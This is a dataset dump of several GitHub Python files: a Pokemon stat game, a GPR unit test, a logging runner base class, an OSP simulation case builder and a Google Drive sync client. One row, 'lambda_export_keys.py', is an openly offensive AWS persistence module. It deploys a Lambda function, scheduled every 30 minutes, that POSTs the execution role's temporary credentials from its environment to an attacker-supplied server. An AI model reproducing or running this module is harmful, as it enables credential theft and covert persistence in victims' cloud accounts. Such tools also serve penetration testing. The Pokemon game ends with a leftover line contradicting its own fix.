seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
41209430964 | import random, requests
def random_pokemon():
    """Fetch a random Generation-I pokemon (ids 1-151) from the PokeAPI.

    Returns:
        dict: the 'name', 'id', 'height', 'weight' and 'order' fields of the
        chosen pokemon.

    Raises:
        requests.RequestException: on network failure or timeout.
    """
    opponent_pokemon_number = random.randint(1, 151)
    url = 'https://pokeapi.co/api/v2/pokemon/{}/'.format(opponent_pokemon_number)
    # BUG FIX: requests.get() without a timeout can hang the game forever if
    # the API is unreachable; bound the wait instead.
    response = requests.get(url, timeout=10)
    pokemon = response.json()
    return {
        'name': pokemon['name'],
        'id': pokemon['id'],
        'height': pokemon['height'],
        'weight': pokemon['weight'],
        'order': pokemon['order']
    }
# Best of 5: each round the player and the computer pick a pokemon and compare
# one chosen stat; most round wins takes the match.
player_wins = 0
computer_wins = 0
for round_number in range(5):
    print()
    player_pokemon_number = input("Choose a pokemon number between 1 and 151 to pick a pokemon: ")
    print()
    url = 'https://pokeapi.co/api/v2/pokemon/{}/'.format(player_pokemon_number)
    response = requests.get(url)
    player_pokemon = response.json()  # full record returned by the PokeAPI
    print("Name: " + player_pokemon['name'])
    print("ID: " + str(player_pokemon['id']))
    print("Height: " + str(player_pokemon['height']))
    print("Weight: " + str(player_pokemon['weight']))
    print("Order: " + str(player_pokemon['order']))
    # (The original built an unused `poke_stat` dict here; removed.)
    print()
    # .strip() so a stray trailing space does not cause a KeyError below.
    choose_stat: str = input('Select one stat you would like to compare between >> "id, height, weight, order: " ').strip()
    opponent_pokemon = random_pokemon()
    print()
    print('The opponent chose {}'.format(opponent_pokemon['name']))
    print("Name: " + opponent_pokemon['name'])
    print("ID: " + str(opponent_pokemon['id']))
    print("Height: " + str(opponent_pokemon['height']))
    print("Weight: " + str(opponent_pokemon['weight']))
    print("Order: " + str(opponent_pokemon['order']))
    player_stat = player_pokemon[choose_stat]
    opponent_stat = opponent_pokemon[choose_stat]
    # CALCULATIONS: higher stat wins the round; equal stats score nothing.
    if player_stat > opponent_stat:
        player_wins += 1
        print("You win")
    elif player_stat < opponent_stat:
        computer_wins += 1
        print("You lost")
    else:
        print('Draw!')
# FINAL RESULTS
print("Your final results:")
if player_wins >= 3:
    print('CONGRATULATIONS You won {} out of 5 games'.format(player_wins))
elif computer_wins >= 3:
    print('You lost, The computer won {} out of 5 games :(, try again!'.format(computer_wins))
else:
    # BUG FIX: the original hard-coded "2 and 2", which is wrong whenever a
    # round is drawn (e.g. 2-1 with two draws). Report the real tallies.
    print('Neither side reached 3 wins: you won {} game(s) and the computer won {} game(s).'.format(player_wins, computer_wins))
print("You won 2 games and The comuputer won 2 games, You drew") | KaraboMolale/CFG-TOP-TRUMPS | CFG_PYTHON_TOP_TRUMPS.py | CFG_PYTHON_TOP_TRUMPS.py | py | 2,624 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "random.randint",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
}
] |
13967663676 | import boto3
import botocore
import os
import time
import zipfile
from colorama import Fore, Style
from functions import create_client
def help():
    """Print the module description, functionality and required permissions."""
    banner = f"{Fore.YELLOW}\n================================================================================================{Style.RESET_ALL}"
    body = (
        "[+] Module Description:\n",
        "\tThis module will create a lambda persistency that will export the temporary credentials",
        "\tfor the role attached to it to a server of your choosing.\n",
        "[+] Module Functionality:\n",
        "\tThe module will ask you for an address of a server you control, the arn of a role to be",
        "\tpassed to the new lambda function and the region to create the lambda. It then will create",
        "\tthe lambda function and assign a trigger that will execute this function every 30 minutes.\n",
        "[+] IMPORTANT:\n",
        "\tYou need the 'iam:passrole' and 'lambda:create_function' permissions.",
    )
    print(banner)
    for line in body:
        print(line)
    print(banner)
def aws_file():
    """Return the raw bytes of the local ``lambda_function.zip`` archive."""
    with open("lambda_function.zip", 'rb') as archive:
        return archive.read()
def create_lambda(client, function_role):
"""Create the 'EventMonitorFunction' Lambda from the locally zipped handler.

client: a boto3 'lambda' client.
function_role: arn of the IAM role passed to the new function.
Returns the raw create_function API response.
"""
response = client.create_function(
FunctionName="EventMonitorFunction",
Runtime="python3.9",
Role=function_role,
Handler="lambda_function.lambda_handler",
Code={
"ZipFile": aws_file()
},
Description="Lambda de monitoramento de Eventos do CloudWatch.",
Publish=True,
PackageType="Zip"
)
return response
# NOTE(review): "eventbrige" is a typo for "eventbridge", kept because
# renaming the function would break its callers (e.g. main()).
def create_eventbrige_rule(client):
"""Create the 'EventMonitor' EventBridge rule firing every 30 minutes.

client: a boto3 'events' client.
Returns the put_rule API response (contains 'RuleArn').
"""
rule = client.put_rule(
Name='EventMonitor',
ScheduleExpression="rate(30 minutes)",
Description="Monitora eventos do CloudWath."
)
return rule
def create_lambda_file(server_address, lambda_path):
    """Generate the exfiltration handler source and zip it to ``lambda_path``.

    The generated lambda POSTs its environment (which holds the execution
    role's temporary credentials) to ``server_address``; the tiny timeout
    makes the request fire-and-forget.

    Args:
        server_address: host (and optional port) of the collection server.
        lambda_path: path of the zip archive to write.
    """
    # BUG FIX: the generated handler body had no indentation, which is
    # invalid Python and would make the deployed Lambda fail to import.
    lambda_code = f"""
import json
import os
import requests
def lambda_handler(event, context):
    environment = os.environ.copy()
    requests.post('http://{server_address}/', json=environment, timeout=0.01)
    return '200 OK'
"""
    try:
        print('[+] Zipping Lambda function...\n')
        with zipfile.ZipFile(lambda_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:
            zip_file.writestr('lambda_function.py', lambda_code)
    except Exception as e:
        print('Failed to zip Lambda: {}\n'.format(e))
def assign_rule_target(client,function_name, function_arn):
"""Point the 'EventMonitor' EventBridge rule at the Lambda function.

client: a boto3 'events' client.
function_name/function_arn: identify the Lambda target.
Returns the put_targets API response.
"""
response = client.put_targets(
Rule="EventMonitor",
Targets=[
{
'Id': function_name,
'Arn': function_arn
}
]
)
return response
def assign_trigger(client, function_name, rule_arn):
"""Grant EventBridge (rule_arn) permission to invoke the Lambda function.

client: a boto3 'lambda' client.
Returns the add_permission API response.
"""
response = client.add_permission(
FunctionName=function_name,
StatementId='EventBridgeFunctionPermission',
Action='lambda:InvokeFunction',
Principal='events.amazonaws.com',
SourceArn=rule_arn
)
return response
def create_lambda_layer(client):
"""Publish the bundled 'requests' package as a Lambda layer.

Reads ./data/requests.zip from disk relative to the working directory.
client: a boto3 'lambda' client.
Returns the publish_layer_version API response.
"""
with open("./data/requests.zip", 'rb') as file_data:
bytes_content = file_data.read()
response = client.publish_layer_version(
LayerName='layer_requests',
Description='Used to perform standard HTTP requests.',
Content={'ZipFile': bytes_content},
CompatibleRuntimes=['python3.9']
)
return response
def check_lambda_status(client, function_name):
    """Return True when the Lambda function's state is 'Active', else False.

    Args:
        client: a boto3 'lambda' client.
        function_name: name of the function to inspect.
    """
    response = client.get_function(
        FunctionName=function_name
    )
    # Idiom fix: return the comparison directly instead of an if/else that
    # returns True/False.
    return response['Configuration']['State'] == 'Active'
def invoke_lambda(client, function_name):
    """Synchronously invoke the Lambda function and return the raw response."""
    return client.invoke(FunctionName=function_name)
def update_layer_information(client, function_name, layer_arn='arn:aws:lambda:sa-east-1:601904299386:layer:layer_requests:1'):
    """Attach a Lambda layer to the function.

    Args:
        client: a boto3 'lambda' client.
        function_name: name of the target function.
        layer_arn: ARN of the layer to attach. Defaults to the previously
            hard-coded 'layer_requests' ARN so existing callers are
            unaffected; pass your own ARN for other accounts/regions.

    Returns:
        The update_function_configuration API response.
    """
    # Generalization: the layer ARN was hard-coded to one account/region,
    # which silently breaks everywhere else. It is now a parameter.
    response = client.update_function_configuration(
        FunctionName=function_name,
        Layers=[layer_arn]
    )
    return response
def main(botoconfig, session):
"""Interactive entry point: build the full Lambda persistence chain.

Prompts for a role arn, a region and the collection-server address, then:
1. writes and zips the exfiltration lambda,
2. creates the EventBridge rule (30 minute schedule),
3. creates the lambda and wires rule <-> function,
4. publishes and attaches the 'requests' layer,
5. removes the local zip.
Returns a dict collecting RuleArn / FunctionName / FunctionArn.
"""
results = {}
print("[+] Starting persistence module...")
function_role = input("[+] Please input the " + Fore.YELLOW + "role arn" + Style.RESET_ALL + " to be passed to the Lambda function: ")
region_name = input("[+] Please input the " + Fore.YELLOW + "region" + Style.RESET_ALL + " to be used: ")
server_address = input("[+] Please input the " + Fore.YELLOW + "server address" + Style.RESET_ALL + " to be used: ")
lambda_path = './lambda_function.zip'
print("[+] Creating Lambda file...")
create_lambda_file(server_address, lambda_path)
print("[+] Creating EventBridge Rule...")
event_client = create_client.Client(botoconfig, session, "events", region_name)
rule_data = create_eventbrige_rule(event_client.create_aws_client())
print(f"[+] Rule created: {Fore.GREEN}{rule_data['RuleArn']}{Style.RESET_ALL}")
results['RuleArn'] = rule_data['RuleArn']
print("[+] Creating Lambda Function...")
lambda_client = create_client.Client(botoconfig, session, "lambda", region_name)
function_data = create_lambda(lambda_client.create_aws_client(), function_role)
print(f"[+] Lambda created: {Fore.GREEN}{function_data['FunctionName']}{Style.RESET_ALL}")
results['FunctionName'] = function_data['FunctionName']
results['FunctionArn'] = function_data['FunctionArn']
print("[+] Assigning target to EventBridge rule...")
target = assign_rule_target(event_client.create_aws_client(), function_data['FunctionName'], function_data['FunctionArn'])
if target ['ResponseMetadata']['HTTPStatusCode'] == 200:
print(f"{Fore.GREEN}[+] Targed Successfully Assinged!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to assign target...{Style.RESET_ALL}")
print("[+] Assigning trigger to Lambda function...")
trigger = assign_trigger(lambda_client.create_aws_client(), function_data['FunctionName'], rule_data['RuleArn'])
if trigger['ResponseMetadata']['HTTPStatusCode'] == 201:
print(f"{Fore.GREEN}[+] Trigger set!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to set Trigger, attack failed...{Style.RESET_ALL}")
print("[+] Creating Lambda Layer...")
# NOTE(review): this builds a raw boto3 client while the others go through
# create_client.Client -- confirm the inconsistency is intentional.
layer_client = boto3.client("lambda", config=botoconfig, region_name=region_name)
layer_information = create_lambda_layer(layer_client)
if layer_information['ResponseMetadata']['HTTPStatusCode'] == 201:
print(f"{Fore.GREEN}[+] Layer created!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to create layer, attack failed...{Style.RESET_ALL}")
print("[+] Checking for lambda status...")
# Poll every 10s until the new function leaves the 'Pending' state.
while True:
token = check_lambda_status(layer_client, function_data['FunctionName'])
if token:
break
else:
time.sleep(10)
print("[+] Assingning Layer to Function...")
update_layer = update_layer_information(layer_client, function_data['FunctionName'])
if update_layer['ResponseMetadata']['HTTPStatusCode'] == 200:
print(f"{Fore.GREEN}[+] Layer assigned! Attack Complete!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to assign layer, attack failed...{Style.RESET_ALL}")
# Remove the local zip regardless of outcome.
os.remove(lambda_path)
return results | MiedzinskiBuck/Kintoun | modules/persistence/lambda_export_keys.py | lambda_export_keys.py | py | 7,404 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "colorama.Fore.YELLOW",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "colorama.Style.RESET_ALL",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": ... |
5606726905 | from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import *
import logging, signal, os, os.path
from wizzat.util import mkdirp, slurp
__all__ = [
'RunnerBase',
]
class RunnerBase(object):
    """
    This is a base class for runners. It supports:
    - Setting up logging
    - Resetting logging for tests
    - Signal handling
    - Hooks for common operations like setup_connections or should_run
    """
    # Class-level defaults; subclasses (or **params in __init__) may override.
    log_root = '/mnt/logs'   # directory where log files are written
    process_name = None      # defaults to "module.ClassName" in setup_logging()
    log_stdout = False       # True -> log to stdout instead of a file

    # Maps signals to the names of the handler methods bound in __init__.
    sig_handlers = {
        signal.SIGTERM : 'sig_term',
        signal.SIGINT  : 'sig_int',
        signal.SIGHUP  : 'sig_hup',
    }

    def __init__(self, **params):
        # NOTE: arbitrary keyword arguments become instance attributes and can
        # override any class default (log_root, process_name, log_stdout, ...).
        self.__dict__.update(params)
        self.terminated = False
        self.interrupted = False
        self.setup_logging()
        self.setup_connections()
        for sig, func in self.sig_handlers.items():
            signal.signal(sig, getattr(self, func))

    def run(self):
        """
        This method provides should_run() and automatic exception handling/logging.
        """
        if not self.should_run():
            return
        try:
            self._run()
            return self
        except Exception:
            logging.exception("Caught exception")
            raise

    def pidfile(self):
        """
        This method can be overridden to return a full file path, which will be checked as a pidfile.
        If the pidfile exists and the process also exists, the process will be flagged as should_run = False.
        """
        return False

    def check_pidfile(self):
        """Return False when a live process already owns the pidfile, else claim it."""
        pidfile = self.pidfile()
        if pidfile:
            logging.info("Checking pidfile: %s", pidfile)
            mkdirp(os.path.dirname(pidfile))
            if os.path.exists(pidfile):
                try:
                    # Does the process exist and can we signal it?
                    pid = int(slurp(pidfile).strip())
                    logging.info("Pidfile %s exists, checking pid %d", pidfile, pid)
                    os.kill(pid, 0)  # signal 0: existence/permission probe only
                    logging.info("Pidfile exists and process can be signaled, aborting")
                    return False
                except (ValueError, OSError):
                    # Stale or corrupt pidfile: fall through and take it over.
                    logging.info("Pidfile exists but process cannot be signaled, continuing")
            logging.info("Writing new pidfile %s (%d)", pidfile, os.getpid())
            with open(pidfile, 'w') as fp:
                fp.write(str(os.getpid()))
        return True

    def setup_connections(self):
        """
        Stub for overriding. Called during init()
        """
        pass

    def should_run(self):
        """
        Should implement logic for determining whether the process should run.
        Memory constraints, CPU constraints, pidfiles, etc go here.
        Called before _run()
        """
        if not self.check_pidfile():
            return False
        return True

    def setup_logging(self):
        """(Re)configure root logging for this runner; safe to call repeatedly."""
        cls = type(self)
        self.process_name = self.process_name or "{}.{}".format(cls.__module__, cls.__name__)
        if self.log_stdout:
            self.log_file = None
        else:
            self.log_file = os.path.join(self.log_root, self.process_name + '.log')
            mkdirp(self.log_root)
        # http://stackoverflow.com/questions/1943747/python-logging-before-you-run-logging-basicconfig
        # This lets you run these guys in tests with a different logging conf per runner
        root = logging.getLogger()
        if root.handlers:
            # BUG FIX: iterate over a copy -- removing handlers while iterating
            # the live list skips every other handler.
            for handler in list(root.handlers):
                root.removeHandler(handler)
        # NOTE(review): '%(msecs)s' is unusual -- logging conventionally uses
        # '%(msecs)03d'; kept as-is since the format is existing behavior.
        logging.basicConfig(
            format   = '%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
            filename = self.log_file,
            level    = logging.INFO,
        )

    def sig_term(self, signal, frame):
        """
        By default, sig_term sets the `terminated` flag. This can be used for main loop control.
        """
        logging.critical('Received sigterm')
        self.terminated = True

    def sig_int(self, signal, frame):
        """
        By default, sig_int sets the `interrupted` flag. This can be used for main loop control.
        """
        logging.critical('Received sigint')
        self.interrupted = True

    def sig_hup(self, signal, frame):
        """
        By default, sig_hup will close and reopen log files (for log rotation)
        """
        logging.critical('Received sighup')
        self.setup_logging()
| wizzat/wizzat.py | wizzat/runner.py | runner.py | py | 4,577 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "signal.SIGTERM",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "signal.SIGINT",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "signal.SIGHUP",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "signal.sign... |
26807859600 | import os
import sys
import numpy as np
import pytest
from numpy.random import rand
sys.path.append(os.path.join(os.path.dirname(__file__), "../.."))
module = __import__("Models", fromlist=["GPR"])
class TestGPR:
"""Consistency tests for the project's GPR surrogate model.

The batch prediction APIs (getPredict*All) must agree with the matching
single-point APIs to within an absolute tolerance of 1e-5 on random data.
"""
@pytest.mark.skip
def test_getPredictValue(self, x):
...
@pytest.mark.skip
def test_getPredictDistribution(self, x):
...
# NOTE(review): 'obj' is parametrized but unused in the test bodies --
# confirm whether it was meant to size a multi-objective training target.
@pytest.mark.parametrize(
("dim", "obj", "num"),
[(3, 2, 10), (5, 3, 10), (10, 10, 10), (5, 5, 20), (10, 10, 50)],
)
def test_getPredictDistributionAll_random(self, dim, obj, num):
# Train on `num` random points of dimension `dim`, then check that batch
# mean/variance match the per-point predictions.
x = np.array([[rand() for _ in range(dim)] for __ in range(num)])
y = np.array([rand() for _ in range(num)])
model = module.GPR.GPR(x, y)
p = np.array([[rand() for _ in range(dim)] for __ in range(num)])
mvL = model.getPredictDistributionAll(p)
for t, mv in zip(p, mvL):
m, v = model.getPredictDistribution(t)
assert np.abs(m - mv[0]) < 1e-5
assert np.abs(v - mv[1]) < 1e-5
@pytest.mark.parametrize(
("dim", "obj", "num"),
[(3, 2, 10), (5, 3, 10), (10, 10, 10), (5, 5, 20), (10, 10, 50)],
)
def test_getPredictValueAll_random(self, dim, obj, num):
# Same as above for the value-only API.
x = np.array([[rand() for _ in range(dim)] for __ in range(num)])
y = np.array([rand() for _ in range(num)])
model = module.GPR.GPR(x, y)
p = np.array([[rand() for _ in range(dim)] for __ in range(num)])
vL = model.getPredictValueAll(p)
for t, v in zip(p, vL):
v2 = model.getPredictValue(t)
assert np.abs(v - v2) < 1e-5
| mit17024317/2020-0730 | Optimizer/Models/test/test_GPR.py | test_GPR.py | py | 1,642 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
72436648354 | import logging
import os
from pathlib import Path
from typing import Union
from dictIO import CppDict, DictReader
from ospx import Graph, OspSimulationCase
__ALL__ = ["OspCaseBuilder"]
logger = logging.getLogger(__name__)
class OspCaseBuilder:
"""Builder for OSP-specific configuration files needed to run an OSP (co-)simulation case."""
def __init__(self):
return
@staticmethod
def build(
case_dict_file: Union[str, os.PathLike[str]],
inspect: bool = False,
graph: bool = False,
clean: bool = False,
):
"""Build the OSP-specific configuration files needed to run an OSP (co-)simulation case.
Builds following files:
- OspSystemStructure.xml
- SystemStructure.ssd
- Plot.json
- statisticsDict
- watchDict
Parameters
----------
case_dict_file : Union[str, os.PathLike[str]]
caseDict file. Contains all case-specific information OspCaseBuilder needs to generate the OSP files.
inspect : bool, optional
inspect mode. If True, build() reads all properties from the FMUs but does not actually create the OSP case files, by default False
graph : bool, optional
if True, creates a dependency graph image using graphviz, by default False
clean : bool, optional
if True, cleans up case folder and deletes any formerly created ospx files, e.g. OspSystemStructure.xml .fmu .csv etc.
Raises
------
FileNotFoundError
if case_dict_file does not exist
"""
# Make sure source_file argument is of type Path. If not, cast it to Path type.
case_dict_file = case_dict_file if isinstance(case_dict_file, Path) else Path(case_dict_file)
if not case_dict_file.exists():
logger.error(f"OspCaseBuilder: File {case_dict_file} not found.")
raise FileNotFoundError(case_dict_file)
if clean:
case_folder: Path = case_dict_file.resolve().parent
_clean_case_folder(case_folder)
logger.info(f"reading {case_dict_file}") # 0
case_dict: CppDict = DictReader.read(case_dict_file, comments=False)
case = OspSimulationCase(case_dict)
try:
case.setup()
# NOTE(review): setup errors are swallowed -- build() logs and returns
# None instead of raising; confirm callers expect silent failure here.
except Exception as e:
logger.exception(e)
return
if inspect:
# inspect and return
case._inspect() # pyright: ignore
return
# Generate the OSP deliverables.
# case.write_osp_model_description_xmls()
case.write_osp_system_structure_xml()
case.write_system_structure_ssd()
if "postProcessing" in case_dict.keys():
case._write_plot_config_json() # pyright: ignore
case.write_statistics_dict()
if graph:
Graph.generate_dependency_graph(case)
case.write_watch_dict()
return
def _clean_case_folder(case_folder: Path):
"""Clean up the case folder and deletes any existing ospx files, e.g. modelDescription.xml .fmu .csv etc."""
import re
from shutil import rmtree
# specify all files to be deleted (or comment-in / comment-out as needed)
case_builder_result_files = [
"*.csv",
"*.out",
"*.xml",
"*.ssd",
"*.fmu",
"*callGraph",
"*.pdf",
"*.png", # 'protect results/*.png'
"watchDict",
"statisticsDict", # 'results',
"zip",
]
# NOTE(review): the pattern is matched with re.search against the FULL path:
# - '^test_' can only match if the whole path starts with 'test_', so it
#   probably never protects anything -- likely meant to match the basename.
# - 'src' matches anywhere in the path, protecting any file whose path
#   merely contains 'src'. Confirm both behaviors are intended.
except_list = ["src", "^test_", "_OspModelDescription.xml"]
except_pattern = "(" + "|".join(except_list) + ")"
logger.info(f"Clean OSP simulation case folder: {case_folder}")
for pattern in case_builder_result_files:
files = list(case_folder.rglob(pattern))
for file in files:
if not re.search(except_pattern, str(file)):
# logger.info("%s in list to clean" % file)
if file.is_file():
# logger.info("file %s cleaned" % file)
file.unlink(missing_ok=True)
else:
# logger.info("dir %s removed" % file)
rmtree(file)
| dnv-opensource/ospx | src/ospx/ospCaseBuilder.py | ospCaseBuilder.py | py | 4,204 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "os.PathLike",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "pathlib.Path",
"l... |
4700100069 | # system imports
import logging
import sys
import os
import io
import concurrent.futures
import shutil
from time import sleep
#import keyring
# google and http imports
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.http import MediaFileUpload
import googleapiclient
import google_auth_httplib2
import httplib2
from googleapiclient import discovery
# application imports
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
from libdata.data_types import *
from libdata.sqlite_store import *
from lib import mods
from lib import keyring
from lib import filewatcher
from config import config as cfg
#from lib.mods import *
# data structure for queueing changes
"""
class Change:
def __init__(self, change: str = "", src_object=None, dst_object=None, type="", retry=0):
if change not in ['modified', 'created', 'deleted', 'moved', 'closed']:
raise "Invalid change type '%s'" % change
if type not in ['file', 'directory']:
raise "Invalid change type '%s'" % type
self.change_type = change
self.object_type=type
self.change_object = src_object
self.dst_object = dst_object
self.retry = retry
"""
def test_func():
    """Smoke-test hook: just announces that it was called."""
    message = "test function called"
    print(message)
def login_to_drive():
"""Obtain Google Drive OAuth credentials.

Resolution order: cached token (OS keyring when cfg.USE_KEYRING, else the
cfg.TOKEN_CACHE file) -> token refresh -> interactive browser consent.
Tokens whose scopes differ from cfg.TARGET_SCOPES are discarded. Returns a
google Credentials object, or None on some failure paths.
"""
logging.info("initializing application credentials")
creds = None
# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if cfg.USE_KEYRING == True:
kr = keyring.Keyring()
else:
kr = None
if cfg.USE_KEYRING == True:
logging.debug("looking for and existing token in the OS keyring")
try:
tokenStr = kr.get_data("gdrive", "token")
if tokenStr is not None and tokenStr != "":
tokenStr = json.loads(tokenStr)
# A scope mismatch invalidates the cached token.
if tokenStr['scopes'] != cfg.TARGET_SCOPES:
creds = None
kr.delete_data("gdrive", "token")
else:
creds = Credentials.from_authorized_user_info(tokenStr, cfg.TARGET_SCOPES)
except Exception as err:
logging.error("Unable to fetch the oauth token from the OS keyring. %s" % str(err))
else:
logging.debug("looking for an existing token in" + cfg.TOKEN_CACHE)
if os.path.exists(cfg.TOKEN_CACHE):
creds = Credentials.from_authorized_user_file(cfg.TOKEN_CACHE, cfg.TARGET_SCOPES)
with open(cfg.TOKEN_CACHE, 'r') as tokenFile:
token = json.loads(tokenFile.read())
if token['scopes'] != cfg.TARGET_SCOPES:
logging.warning("token cache scopes are not valid, removing token")
creds = None
os.remove(cfg.TOKEN_CACHE)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
logging.warning("valid credentials weren't found, initializing oauth consent from in default browser.")
try:
if creds and creds.expired and creds.refresh_token:
try:
creds.refresh(Request())
except HttpError as err:
logging.error("error logging in to google drive. %s" % str(err))
except Exception as err:
# if refersh token expired, remove the token cache and rerun self
if 'invalid_grant: Token has been expired or revoked.' in err.args[0]:
logging.warning("oauth refresh token expired, clearing token cache.")
if cfg.USE_KEYRING == True:
kr.delete_data("gdrive", "token")
else:
os.remove(cfg.TOKEN_CACHE)
# NOTE(review): this frame returns None after the recursive retry
# (the retried credentials are discarded) -- confirm callers re-call
# login_to_drive in that case.
login_to_drive()
return
logging.error("error logging in to Google Drive. %s" % str(err))
else:
flow = InstalledAppFlow.from_client_secrets_file(cfg.APP_CREDS, cfg.TARGET_SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
if cfg.USE_KEYRING == True:
kr.store_data("gdrive", "token", creds.to_json())
else:
with open(cfg.TOKEN_CACHE, 'w+') as token:
logging.debug("saving credentials to " + cfg.TOKEN_CACHE)
token.write(creds.to_json())
except HttpError as err:
print(err)
return creds
# Create a new Http() object for every request
# https://googleapis.github.io/google-api-python-client/docs/thread_safety.html
# overrides the constructor of the http2 object
def build_request(http, *args, **kwargs):
"""requestBuilder hook for googleapiclient.

Gives every request its own AuthorizedHttp/httplib2 pair because httplib2
is not thread safe; the `http` argument passed in is deliberately ignored.
"""
new_http = google_auth_httplib2.AuthorizedHttp(cfg.CREDENTIALS, http=httplib2.Http())
return googleapiclient.http.HttpRequest(new_http, *args, **kwargs)
# get the root folder
def get_root_folder(service) -> gFolder:
"""Return the Drive root folder as a gFolder, or None if the API call fails."""
logging.debug("fetching the root folder")
rootFolder = None
try:
gServiceFiles = service.files()
params = { "fileId": 'root'
}
request = gServiceFiles.get(**params)
rootFolderResult =request.execute()
rootFolder = gFolder(rootFolderResult)
except HttpError as err:
logging.error("error fetching the root folder." + str(err))
print(err)
return rootFolder
# print out the google drive folder tree (won't be used in production)
def print_folder_tree(folders = None):
"""Debug helper: print the folder hierarchy as an indented tree.

`folders` is a flat list of gFolder objects with .children already linked.
NOTE(review): raises if folders is None (the default) or if no entry has
cfg.ROOT_FOLDER_ID -- confirm callers always pass a populated list.
"""
# grab the root folder
rootFolder = list(filter(lambda rf: rf.id == cfg.ROOT_FOLDER_ID, folders))
#print(rootFolder[0]['name'])
def printTree(parent, level=0):
print("-" * level + parent.name)
for child in parent.children:
printTree(child, level+1)
#printTree(folders, rootFolder[0], 0)
printTree(rootFolder[0], 0)
return
def get_full_folder_path(service, folder: gFolder)-> str:
"""Build the Drive path ('root/.../name') for `folder` by walking parent links.

Folders not owned by the current user are nested under '_shared_withme/'.
Only parents[0] is followed at each level. On API error, returns whatever
partial path was accumulated so far.
"""
full_path = str(folder.name)
try:
if 'parents' in folder.properties.keys():
gServiceFiles = service.files()
params = { "fileId": folder.properties['parents'][0], "fields": "parents, mimeType, id, name, ownedByMe"}
request = gServiceFiles.get(**params)
parent = request.execute()
full_path = parent['name'] + "/" + full_path
# Keep prepending ancestors until a parentless (top-level) folder.
while 'parents' in parent.keys():
params = { "fileId": parent['parents'][0], "fields": "parents, mimeType, id, name, ownedByMe"}
request = gServiceFiles.get(**params)
parent = request.execute()
full_path = parent['name'] + "/" + full_path
if parent['ownedByMe'] == False:
# a folder shared outside of the current owner for the drive object.
# stick in the root folder
full_path = "_shared_withme/" + full_path
else:
if folder.properties['ownedByMe'] == False:
full_path = "_shared_withme/" + full_path
except Exception as err:
logging.error("Error getting full local path for folder id %s. %s" % (folder.id, str(err)))
print(str(err))
return full_path
# download a single file (will be called multi-threaded)
def download_file(service, file: gFile, targetPath:str, threadSafeDB:sqlite_store = None):
"""Download one regular (non-native) Drive file to `targetPath`.

Writes the file, stores md5 + local path on the gFile, mirrors the Drive
modified time onto the local file and records the file in the database
(the per-thread `threadSafeDB` when given, else cfg.DATABASE).
Returns a human-readable status string used by the thread-pool logs.
"""
logging.debug("beginning to download file %s", file.name)
sReturn = ""
try:
gServiceFiles = service.files()
params = { "fileId": file.id,
"acknowledgeAbuse": True
}
request = gServiceFiles.get_media(**params)
fileData = io.BytesIO()
downloader = MediaIoBaseDownload(fileData, request)
done = False
logging.info("downloading file %s." % targetPath)
#print("downloading file %s." % targetPath)
fileDir = os.path.dirname(targetPath)
if not os.path.exists(fileDir):
logging.debug("file's parent directory '%s' doesn't exist, creating." % fileDir)
os.makedirs(os.path.expanduser(fileDir))
while done is False:
status, done = downloader.next_chunk()
#print(F'Download {int(status.progress() * 100)}.')
with open(targetPath, "wb+") as f:
f.write(fileData.getbuffer())
file.localPath = targetPath
file.md5 = mods.hash_file(targetPath)
# update the file timestamp to match what's in Drive
# NOTE(review): strftime('%s') is a platform-specific (glibc) extension --
# confirm portability on non-Linux targets.
mod_time = int(datetime.datetime.strptime(file.properties['modifiedTime'][:-5], '%Y-%m-%dT%H:%M:%S').strftime("%s"))
os.utime(targetPath, (mod_time, mod_time))
if threadSafeDB is not None:
threadSafeDB.insert_gObject(file=file)
else:
cfg.DATABASE.insert_gObject(file=file)
fileSize = os.path.getsize(targetPath)
sReturn = "file %s written %d byes." % (targetPath, fileSize)
except HttpError as err:
logging.error("error downloading file. %s" % str(err))
print(err)
sReturn = "file %s download failed with %s" % (targetPath, str(err))
except Exception as err:
logging.error("error downloading file. %s" % str(err))
print(err)
sReturn = "file %s download failed with %s" % (targetPath, str(err))
return sReturn
# export a native google document format (can't be downloaded)
def export_native_file(service, file: gFile, targetPath: str) -> bool:
    """Export a native Google-application file (Docs/Sheets/...) to disk.

    Native Google formats cannot be downloaded directly; they are exported to
